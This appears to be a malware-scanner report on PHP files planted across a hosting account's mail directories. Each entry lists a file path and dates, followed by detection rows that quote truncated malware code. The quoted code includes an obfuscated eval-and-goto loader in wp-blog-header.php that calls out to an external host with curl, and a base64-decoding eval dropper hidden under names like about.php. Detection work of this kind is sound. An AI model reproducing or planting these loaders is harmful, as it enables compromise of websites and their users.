| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/mail/adayinthelife.net/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/mail/cur/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/mail/new/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/mail/peskin.org/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/mail/tmp/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/mail/turtlesys.com/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/mail/turtlesys.net/billing-user/.Drafts/index.php Size: 1.49 kB Created: 2023-03-11 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/mail/turtlesys.net/bpeskin/.Drafts/dropdown.php Size: 1.49 kB Created: 2023-09-06 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/mail/turtlesys.net/bpeskin/.turtlesys.clients.Wise/about.php Size: 1.49 kB Created: 2023-07-01 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/mail/turtlesys.net/bpeskin/.turtlesys.contractors/admin.php Size: 1.49 kB Created: 2023-09-29 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/mail/turtlesys.net/brother/.Drafts/themes.php Size: 1.49 kB Created: 2023-05-18 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/mail/turtlesys.net/nagios/dropdown.php Size: 1.49 kB Created: 2023-08-15 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/mail/turtlesys.net/support-user/.Archive/text.php Size: 1.49 kB Created: 2023-10-15 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/mail/turtlesys.net/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/mail/shawndees.com/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/mail/text.php Size: 1.49 kB Created: 2023-10-16 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5
| Description | Match |
|---|
